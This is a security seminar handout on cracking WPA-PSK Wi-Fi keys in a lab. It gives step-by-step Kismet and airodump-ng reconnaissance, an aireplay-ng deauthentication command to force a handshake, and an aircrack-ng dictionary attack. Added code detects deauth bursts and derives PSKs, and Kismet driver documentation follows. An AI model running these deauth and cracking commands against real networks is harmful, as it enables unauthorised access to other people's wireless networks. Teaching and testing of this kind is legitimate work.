Wireless Penetration Testing: Cracking WPA-PSK

Security Seminar by:

    Edward Brian Drumheller Jr.
    Joseph Allan Krug Esquire
    Justin Thomas Lewis


Preparation

For this seminar we are using a bootable Linux CD-ROM distribution, BackTrack 3 Beta (14-12-2007). This is a fully operational operating system that boots from a CD. To follow the seminar you will need a CD-R drive and a CD-R or CD-RW disc to burn the image file to. The image file can be downloaded from the mirror websites listed at http://www.remote-exploit.org/backtrack_download.html. Once you have the image (the file is 700 MB, so it can take a while to download), burn it to a CD. If you do not have a program that can burn an image file, download one such as http://cdburnerxp.se/

Once finished, shut your computer down and restart it. You may need to go into your BIOS to change the default boot order so that the CD-ROM boots before your hard drive. Pay attention when the system first boots up: there should be a prompt for the BIOS, often called "setup". Inside, find where you can change the boot order, commonly under "boot". Save the settings and exit.

Your system should now restart.

If prompted, press any key to boot the live disc.

When asked, boot into the KDE option.

Once the desktop loads, follow these directions:

Open a terminal window and run the command "wget http://eddrumheller.com/pen/word.lst". The file is downloaded to your home directory and is used later (it is the dictionary file for the cracking step).


Cracking WPA-PSK

1.     Open a terminal window and run the command "iwconfig".

2.     Write down the interface that has wireless extensions (this is your wireless adapter; the commands below use eth0 as an example).

3.     Make sure the mode of the card is set to Monitor.

       a.     If the mode is set to Managed, run the command "iwconfig <wirelessAdapter> mode monitor".

4.     Open the Kismet configuration file by running the command "vi /usr/local/etc/kismet.conf".

       Change line 27, "# source=none,none,addme", to "source=<kismetDriver>,<wirelessAdapter>,<wireless>" (the fields are the capture source type for your driver, the interface from step 2, and a name of your choice; the source types are listed in the Kismet documentation at the end of this handout).

       Run Kismet by running the command "kismet" in the terminal. Startup output will be printed, and then a text-mode interface will be displayed in the window.

       a.     Press h to view the help menu.

       b.     Press x to close any pop-up menu.

       c.     Press s to bring up the sort menu.

       d.     Press b to sort by BSSID.

       e.     Highlight the network named "dd-wrt".

       f.     Press Enter to view its information.

       g.     Write down the BSSID and channel number.

       h.     Close the Kismet terminal window (mandatory, so that it releases the adapter).

5.     Open a new terminal and type the command "airodump-ng -c <channel of AP> --bssid <AP's bssid> -w capture eth0".

       a.     Leave this window open; this program will be capturing the handshake.

6.     Open another terminal and type "aireplay-ng -0 5 -a <AP's bssid> -c <client's MAC address> eth0" to send de-authentication packets to a client that is already authenticated, forcing it to reconnect.

7.     View the aireplay-ng and airodump-ng terminals side by side. If the injection worked, "WPA handshake: <BSSID>" will be displayed in the upper right-hand corner of the airodump-ng window.

       a.     The captured handshake is now stored in your home directory (capture-01.cap, or a higher number if you ran airodump-ng more than once).

8.     Crack the handshake with aircrack-ng using the command

       aircrack-ng -w <location of a dictionary file> -b <AP's bssid> capture*.cap

       The dictionary file downloaded during preparation is word.lst in your home directory.

Note: the key will be displayed once it is found; if the passphrase is not in the dictionary, aircrack-ng will report that it was not found.
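Steps 6 and 7 depend on a burst of de-authentication frames aimed at one BSSID, and that burst is what a wireless IDS looks for. The detector below is an added example, not code from the seminar or from Kismet or aircrack-ng; it parses raw 802.11 management frames (header at offset 0, no radiotap or prism pseudo-header), counts deauth/disassoc frames per BSSID in a sliding window, and alerts on a burst while ignoring the single deauth that is normal protocol behaviour. All MAC addresses, frames, function names and thresholds are constructed for the demonstration.

```python
"""Deauthentication-burst detector over raw 802.11 management frames.

Added example, not part of the original seminar handout.  Input is a list of
(timestamp_seconds, frame_bytes) pairs with the 802.11 header at offset 0
(no radiotap/prism pseudo-header).  MAC addresses and frames are constructed
here for the demonstration and do not belong to real devices.
"""
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def parse_mgmt_frame(frame):
    """Return the header fields of a management frame, or None for anything else."""
    if len(frame) < 24:                          # shorter than a full 802.11 header
        return None
    fc0, _fc1, _duration = struct.unpack_from("<BBH", frame, 0)
    if (fc0 >> 2) & 0x3 != TYPE_MGMT:
        return None
    fields = {
        "subtype": fc0 >> 4,
        "addr1": frame[4:10].hex(":"),           # receiver
        "addr2": frame[10:16].hex(":"),          # transmitter
        "addr3": frame[16:22].hex(":"),          # BSSID in management frames
    }
    if fields["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        fields["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return fields


def detect_deauth_bursts(frames, window=1.0, threshold=5):
    """Alert once per BSSID when >= threshold deauth/disassoc frames fall within `window` s.

    A lone deauth is ordinary 802.11 behaviour; a tight burst against one BSSID
    is what an injection tool produces and what a WIDS should flag.
    """
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ts, raw in frames:                       # frames must be in time order
        hdr = parse_mgmt_frame(raw)
        if hdr is None or hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[hdr["addr3"]]
        q.append(ts)
        while q and ts - q[0] > window:          # drop frames that left the window
            q.popleft()
        if len(q) >= threshold and hdr["addr3"] not in alerted:
            alerted.add(hdr["addr3"])
            alerts.append({"bssid": hdr["addr3"], "target": hdr["addr1"],
                           "count": len(q), "first_seen": q[0], "last_seen": ts})
    return alerts


def _sample_frame(subtype, addr1, addr2, addr3, body=b""):
    """Build a minimal management frame; used only to construct the sample input."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)
    return struct.pack("<BBH", fc0, 0, 0) + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00" + body


# Constructed sample (placeholder locally-administered MACs, not real devices).
AP = "02:11:22:33:44:55"
CLIENT = "02:aa:bb:cc:dd:ee"
REASON_CLASS3 = struct.pack("<H", 7)             # "class 3 frame from non-associated STA"


def sample_capture():
    frames = [(0.0, _sample_frame(SUBTYPE_BEACON, BROADCAST, AP, AP))]
    # one deauth at t=1 s is normal protocol behaviour and must not alert
    frames.append((1.0, _sample_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, REASON_CLASS3)))
    # eight deauths in 0.35 s, the shape of an injected burst, should alert
    for i in range(8):
        frames.append((10.0 + i * 0.05, _sample_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, REASON_CLASS3)))
    frames.append((11.0, b"\x08\x00short"))      # truncated frame, ignored
    return frames


if __name__ == "__main__":
    for a in detect_deauth_bursts(sample_capture()):
        print(f"deauth burst on {a['bssid']}: {a['count']} frames in "
              f"{a['last_seen'] - a['first_seen']:.2f} s toward {a['target']}")
```

On a real capture, feed the frames from a monitor-mode pcap after stripping its link-layer pseudo-header; the threshold and window should be tuned to the site's normal roaming rate.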


 

Directions to connect to an AP secured with WPA in BackTrack2

To connect to a WPA network, a little bit of work is needed:

* Creating a conf file
* Running the script

Creating the .conf file:

Open your favourite editor and add the following:

    network={
        ssid="youraccesspointname"
        psk="youraccesspointspassword"
    }

Save this in /root as wpa.conf.

Running the script:

First run this command (change eth0 to your adaptor):

    wpa_supplicant -i eth0 -c wpa.conf

-i = specifies which interface to use
-c = specifies the location of the .conf file

This should bring up a message stating that the connection has been successful. It is important not to close this shell.

Then open another shell and type (again changing eth0 to your adaptor):

    dhcpcd eth0

Test the connection.
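The psk="..." line above and the dictionary attack in step 8 of the cracking section are two sides of the same derivation: IEEE 802.11i turns the passphrase into the 256-bit PSK with PBKDF2-HMAC-SHA1, salted with the SSID, 4096 iterations. The example below is added here and is not code from the handout or from wpa_supplicant; it implements that derivation with the standard's input limits, checks it against the IEEE test vector (passphrase "password", SSID "IEEE"), and renders the wpa.conf block with the hex PSK instead of the quoted passphrase, which is what the wpa_passphrase utility prints and which keeps the reusable passphrase out of the file. Function names are this example's own.

```python
"""WPA-PSK derivation as performed by wpa_supplicant and wpa_passphrase.

Added example, not part of the original handout.  IEEE 802.11i defines
PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
The SSID salt only defeats a precomputed table shared across networks; every
candidate passphrase still costs just 4096 rounds, so passphrase entropy is
the defender's only lever against the dictionary attack in step 8.
"""
import hashlib

PBKDF2_ITERATIONS = 4096
PSK_LEN = 32


def derive_psk(passphrase, ssid):
    """Return the 64-hex-character PSK, enforcing the input limits from the standard."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid_bytes,
                               PBKDF2_ITERATIONS, PSK_LEN).hex()


def network_block(ssid, passphrase):
    """The handout's wpa.conf block with an unquoted 64-hex psk= in place of the
    quoted passphrase; wpa_supplicant accepts either form for the same network."""
    return ("network={\n"
            f'\tssid="{ssid}"\n'
            f"\tpsk={derive_psk(passphrase, ssid)}\n"
            "}\n")


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print(derive_psk("password", "IEEE"))
    # the handout's placeholders, rendered with the derived key
    print(network_block("youraccesspointname", "youraccesspointspassword"))
```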

 


KISMET Documentation

12. Capture Sources

    A capture source in Kismet is anything which provides packets to the Kismet
    engine.  Capture sources define the underlying engine needed to capture
    data from the interface, how to change channel, and how to enter rfmon
    mode.  It is necessary to tell Kismet what specific type of card you use
    because different drivers often use different methods to report information
    and enter monitor mode.

    Source type     Cards               OS          Driver
    --------------- ------------------- ----------- -------------------------
    acx100          TI ACX100           Linux       ACX100
                    http://acx100.sourceforge.net/
                    ACX100 drivers handle the 22mbit cards branded by D-Link
                     and others.

    admtek          ADMTek              Linux       ADMTek
                    http://www.latinsud.com/adm8211/        (Patches)
                    http://aluminum.sourmilk.net/adm8211/   (GPL driver)
                    ADMTek drivers used in many consumer 802.11b cards. With
                     the patches above, quasi-rfmon is possible - these cards
                     appear to be almost entirely software controlled and
                     always in a rfmon-like state.  This card WILL BROADCAST
                     while in rfmon, rendering the sniffer visible.
                    The fully GPL drivers are supported, in addition to the
                     hacks to the non-free drivers.

    airpcap         Airpcap USB         cygwin      CACE Tech
                    http://www.cacetech.com/products/airpcap.htm
                    The CACE AirPcap USB device allows native capture on
                     Win32/Cygwin.
                    The explicit airpcap source expects the Win32/Cygwin
                     interface name.  This should be used once the source
                     is identified via airpcap_ask or if multiple simultaneous
                     sources are required.

    airpcap_ask     Airpcap USB         cygwin      CACE Tech
                    http://www.cacetech.com/products/airpcap.htm
                    The CACE AirPcap USB device allows native capture on
                     Win32/Cygwin.
                    The airpcap_ask source lists available airpcap devices
                     and allows the user to pick interactively.
                    The 'capture interface' field is irrelevant and can be
                     filled with any value (for example, 'dummy')

    atmel_usb       Atmel-USB           Linux       Berlios-Atmel
                    http://at76c503a.berlios.de/
                    These drivers work ONLY on USB cards (Sorry, no PCMCIA
                     support).  Monitor mode support is limited and "faked"
                     by bypassing part of the firmware and parsing packets
                     directly, and is likely to not report all of the
                     frames.
                    This card MAY BROADCAST while in rfmon, rendering the
                     sniffer visible.
                    It appears that this card may be only formatting the
                     beacons as an 802.11 stream, which means you likely
                     will not see data frames, rendering most IDS functions,
                     IP discovery, and data logging unavailable.

    ath5k           Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Based on the OpenBSD OpenHAL, the Ath5k drivers are the
                     future of Atheros support and will be mainlined into the
                     Linux kernel.

    ath5k_a         Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Ath5k source for 11a only

    ath5k_ag        Atheros             Linux       Kernel/Madwifi
                    http://madwifi.org
                    Ath5k source for 11a/11g

    bcm43xx         Broadcom            Linux       BCM43XX
                    http://bcm43xx.berlios.de, kernel
                    Linux native broadcom drivers incorporated into modern
                     kernels.

    b43             Broadcom            Linux
                    B43 broadcom drivers for current Broadcom devices in
                     Linux kernels

    b43legacy       Broadcom            Linux
                    B43 broadcom drivers for legacy Broadcom devices in
                     Linux kernels

    cisco           Aironet 340,350     Linux       Kernel 2.4.10 - 2.4.19
                    Standard Cisco cards in Linux.  Works only with
                     the Linux kernel drivers, not the drivers found in
                     pcmcia-cs.
                    The drivers found on the cisco.com site can be patched
                     with the files from the Kismet download site to add
                     monitor mode with channel control, HOWEVER these drivers
                     are extremely buggy for normal use and work only with
                     the 2.4 kernel tree.
                    The cisco drivers currently do not enter rfmon mode
                     correctly, so channel control is not available.  The
                     firmware will hop to whatever channel it feels like
                     hopping to, when it feels like hopping.

    cisco_wifix     Aironet 340,350     Linux       Kernel 2.4.20+, CVS
                    http://sourceforge.net/projects/airo-linux/
                    Capture interface:  'ethX:wifiX'
                    Kernel 2.4.20+ and CVS drivers use ethX for normal mode
                     and wifiX for monitor mode.  Kismet needs to know both
                     devices, which may not necessarily be the same number,
                     for example 'eth1:wifi0'.
                    Linux kernel 2.4.20 and 2.4.21 have highly unstable cisco
                     drivers and should be avoided.
                    The cisco drivers currently do not enter rfmon mode
                     correctly, so channel control is not available.  The
                     firmware will hop to whatever channel it feels like
                     hopping to, when it feels like hopping.

    darwin          OSX native cards    OSX/Darwin  OSX
                    Supports both Broadcom and Atheros Airport-Extreme cards.
                    When using a Broadcom based card, it may be necessary to
                     enable rfmon on the device for the first time using another
                     program.
                    When using an Atheros based card, 802.11a may also be supported
                     by adding a 'sourcechannels' line to kismet.conf.

    hostap          Prism/2             Linux       HostAP 0.4
                    http://hostap.epitest.fi/
                    HostAP drivers drive the Prism/2 chipset in access point
                     mode, but also can drive the cards in client and monitor
                     modes.  The HostAP drivers seem to change how they go
                     into monitor mode fairly often, but this source should
                     manage to get them going.

    ipw2100         Intel/Centrino      Linux       ipw2100-0.44+
                    http://ipw2100.sourceforge.net/
                    The Linux IPW2100/Centrino drivers for 802.11b cards
                     now support rfmon, so here's support for them.  They act
                     more or less like any other wireless interface would.

    ipw2200         Intel/Centrino      Linux       ipw2200-1.0.4+
                    http://ipw2200.sourceforge.net/
                    The Linux IPW2200/Centrino drivers for 802.11bg cards
                     support rfmon as of 1.0.4 and firmware 2.3.
                    Signal level reporting requires radiotap be turned on
                     in the makefile while compiling the driver.  Noise levels
                     are not reported.

    ipw2915         Intel/Centrino      Linux       ipw2200-1.0.4+
                    http://ipw2200.sourceforge.net/
                    The Linux IPW2200/Centrino drivers for 802.11bga cards
                     support rfmon as of 1.0.4 and firmware 2.3.
                    This is the same as ipw2200 but defaults to scanning the
                     802.11a channel range in addition to 802.11b/g.
                    Signal level reporting requires radiotap be turned on
                     in the makefile while compiling the driver.  Noise levels
                     are not reported.

    ipw3945         Intel/Centrino      Linux       ipw3945
                    http://ipw3945.sourceforge.net/
                    The Linux IPW3945/Centrino drivers for Intel Core
                     802.11bga cards.

    ipwlivetap      Intel/Centrino      Linux       ipw2200/3945
                    http://ipw2200.sourceforge.net/
                    http://ipw3945.sourceforge.net/
                    The ipw3945 and patched ipw2200 drivers support a
                     special mode which allows monitor-mode style sniffing
                     while remaining associated.  Channel hopping is not
                     possible, as the card is still associated to a
                     specific AP, but single-channel IDS and sniffing can
                     be accomplished.  See the ipw driver mailing list
                     archives for information about patching your drivers.

    iwl3945         Intel/Centrino      Linux       iwl3945
                    Intel's new IPW drivers using the mac80211 kernel
                     layer.

    iwl4965         Intel/Centrino      Linux       iwl4965
                    Intel's new IPW drivers using the mac80211 kernel
                     layer.

    kismet_drone    n/a                 Any         n/a
                    Capture interface:  'dronehost:port'
                    The remote drone capture source connects to a Kismet
                     drone and processes the packets.  Refer to the Remote
                     Drone section of the README for more details about how
                     to set up a drone.

    madwifi_a       Atheros             Linux       madwifi
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'athX'
                    Capture interface:  'wifiX' (Madwifi-NG)
                    Madwifi drivers in 802.11a-only mode.
                    When using madwifi-ng, be sure all non-monitor VAPs have
                     been removed, otherwise madwifi will not properly report
                     most traffic.

    madwifi_b       Atheros             Linux       madwifi
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'athX'
                    Capture interface:  'wifiX' (Madwifi-NG)
                    Madwifi drivers in 802.11b-only mode.
                    When using madwifi-ng, be sure all non-monitor VAPs have
                     been removed, otherwise madwifi will not properly report
                     most traffic.

    madwifi_g       Atheros             Linux       madwifi
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'athX'
                    Capture interface:  'wifiX' (Madwifi-NG)
                    Madwifi drivers in 802.11g-only mode.  This will,
                     obviously, also see 11b networks.
                    When using madwifi-ng, be sure all non-monitor VAPs have
                     been removed, otherwise madwifi will not properly report
                     most traffic.

    madwifi_ab      Atheros             Linux       madwifi
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'athX'
                    Capture interface:  'wifiX' (Madwifi-NG)
                    Madwifi drivers in 802.11a and 802.11b combo mode.  This
                     will seamlessly switch between bands during channel
                     hopping.
                    When using madwifi-ng, be sure all non-monitor VAPs have
                     been removed, otherwise madwifi will not properly report
                     most traffic.

    madwifi_ag      Atheros             Linux       madwifi
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'athX'
                    Capture interface:  'wifiX' (Madwifi-NG)
                    Madwifi drivers in 802.11a and 802.11g combo mode.  This
                     will seamlessly switch between bands during channel
                     hopping.
                    When using madwifi-ng, be sure all non-monitor VAPs have
                     been removed, otherwise madwifi will not properly report
                     most traffic.

    madwifing_a     Atheros             Linux       madwifi-ng
    madwifing_ab    Atheros             Linux       madwifi-ng
    madwifing_ag    Atheros             Linux       madwifi-ng
    madwifing_g     Atheros             Linux       madwifi-ng
    madwifing_b     Atheros             Linux       madwifi-ng
                    http://sourceforge.net/projects/madwifi/
                    Capture interface:  'wifiX'
                    *Deprecated*.  Detection for madwifi-ng is built into
                     the standard madwifi sources.  The _ng source names
                     have been kept to allow old configs to continue
                     functioning.

    nokia770        Nokia/TI            Linux       Nokia/TI
                    http://maemo.org/
                    Nokia770 capture interface.  Includes support for
                     validating frame checksums to screen out junk
                     packets, since the drivers pass us all data.

    orinoco         Lucent, Orinoco     Linux       Patched orinoco_cs
                    http://airsnort.shmoo.com/orinocoinfo.html
                    The Orinoco drivers which have mainlined into the Linux
                     kernel do support monitor mode, however only specific firmware
                     versions are supported and often they do not work.
                    An up-ported version of the older Orinoco drivers which more
                     reliably supported rfmon may be available at:
                     http://www.projectiwear.org/~plasmahh/orinoco.html
                    Generally, Orinoco cards are not recommended for use with
                     Kismet due to these limitations.

    orinoco_14      Lucent, Orinoco     Linux       Orinoco 0.14+
                    https://savannah.nongnu.org/projects/orinoco/
                    This source is deprecated and should only be used with
                     pre-release versions of a driver since merged into the Linux
                     kernel.

    pcapfile        n/a                 Any         n/a
                    Capture interface:  '/path/to/file'
                    The pcapfile capture source feeds a stored 802.11-encap
                     dump file through the Kismet engine again.  This can be
                     useful for debugging or rescanning old logs for
                     alert conditions.  Pcapfile sources are only available
                     if Kismet was compiled with libpcap support.

    prism2_openbsd  Prism/2             OpenBSD     Kernel
                    Full support for Prism2 under OpenBSD.

    prism54g        PrismGT             Linux       prism54
                    http://www.prism54.org
                    PrismGT 802.11g drivers supporting monitor mode.

    radiotap_bsd_ab Radiotap            BSD         Kernel
                    Dual-band cards with radiotap headers.

    radiotap_bsd_a  Radiotap            BSD         Kernel
                    802.11a cards (or dual-band on 11a channels only) with
                     radiotap headers.

    radiotap_bsd_b  Radiotap            BSD         Kernel
                    802.11b/g cards (or dual-band on 11b channels only) with
                     radiotap headers.

    rt2400          Ralink 2400 11b     Linux       rt2400-gpl
                    http://rt2x00.serialmonkey.com/
                    Ralink 2400 802.11b cards using the serialmonkey GPL'd
                     rt2x00 drivers.  Must use 1.2.2 beta 2 or newer drivers.

    rt2500          Ralink 2500 11g     Linux       rt2500-gpl
                    http://rt2x00.serialmonkey.com/
                    Ralink 2500 802.11g cards using the serialmonkey GPL'd
                     rt2x00 drivers.  Must use 1.1.0 beta 2 or newer drivers.

    rt73            Ralink 73   11g     Linux       rt73-gpl-cvs
                    http://rt2x00.serialmonkey.com/
                    Ralink 73 802.11g USB cards using the serialmonkey GPL'd
                     rt79 drivers (tested only with CVS driver versions)

    rt8180          Realtek 8180 11b    Linux       rtl8180-sa2400
                    http://rtl8180-sa2400.sourceforge.net/
                    Realtek 8180 based cards (there seem to be an awful lot of
                     them) using the GPL drivers.

    viha            Airport             OSX         viha
                    http://www.dopesquad.net/security/
                    Monitor mode support for Airport under OSX.  Does not
                     support Airport Extreme.

    vtar5k          Atheros 802.11a     Linux       vtar5k
                    http://team.vantronix.net/ar5k/
                    vtar5k drivers handle some Atheros 802.11a cards.  Chances
                     are you'll have better luck with madwifi drivers.

    wlanng_legacy   Prism/2             Linux       wlan-ng 0.1.3 and earlier
                    http://www.linux-wlan.com/
                    Old wlan-ng drivers didn't support pcap capturing and
                     use a netlink socket to the kernel.  These are still in
                     use on some embedded systems (like the Zaurus).

    wlanng          Prism/2             Linux       wlan-ng 0.1.4 - 0.1.9
                    http://www.linux-wlan.com/
                    Wlan-ng prism2 drivers prior to the AVS headers.

    wlanng_avs      Prism/2             Linux       wlan-ng 0.2.0+
                    http://www.linux-wlan.com/
                    Newer wlan-ng drivers support a new header type and
                     slightly different monitor commands to report wepped
                     packets.

    wrt54g          Linksys WRT54G      Linux       linksys
                    http://seattlewireless.net/index.cgi/LinksysWrt54g
                    Capture interface:  'ethX'
                    Capture interface:  'ethX:prismX'
                    Support for the drivers found in the embedded Linux
                     inside the Linksys WRT54G (and probably other APs using
                     the same firmware).
                    Newer firmwares (such as OpenWRT) use the prism0 device
                     for monitor mode data.  On these firmwares, specify both
                     interfaces (wrt54g,eth1:prism0,foo)

    wsp100          NetChem WSP100      Any         n/a
                    http://networkchemistry.com/
                    Capture interface:  'host:port'
                    The WSP100 is an embedded device which reports 802.11
                     packets over UDP.  The wsp100 capture source is
                     (generally) system agnostic, however over time it has
                     been less maintained than others.  If you'd like to
                     send me patches for this, please let me know.

    zd1211          ZyDAS USB           Linux       zd1211
                    http://zd1211.ath.cx
                    The ZD1211 drivers have had some regressions which lead to
                     data corruption while changing channel.  Some versions
                     work, and typically the aircrack patches resolve the
                     corruption issues if your version doesn't properly handle
                     rfmon.

    Chipsets known to NOT WORK:
     Broadcom           - No linux drivers, only usable with ndiswrapper or
                          linuxant wrappers around windows drivers.
                          *** UPDATE ***
                          See the bcm43xx source type entry.  There are
                          experimental reverse-engineered drivers which have
                          monitor mode support now under Linux!  If they don't
                          work, however, then too bad.
     Airport Extreme    - Really a Broadcom, with no rfmon in the OSX drivers.
                          *** UPDATE ***
                          See the bcm source for linux on ppc, it MAY work, it
                          may not.  Currently there's no solution for OSX but
                          I'm looking for OSX hackers interested in redoing the
                          Kismet port and looking into adding more support.
     Atmel              - There is a hack for pseudo-monitor in USB.  There is
                          currently no equivalent hack for PCMCIA.
     HermesII           - Proxim successor to the Orinoco/HermesI.  No support
                          yet in the drivers, may be available in the future.
     ndiswrapper        - Anything using ndiswrapper is using WINDOWS drivers
                          AND CAN NOT BE USED WITH KISMET.


For more detailed information about Kismet, visit kismetwireless.net/documentation.shtml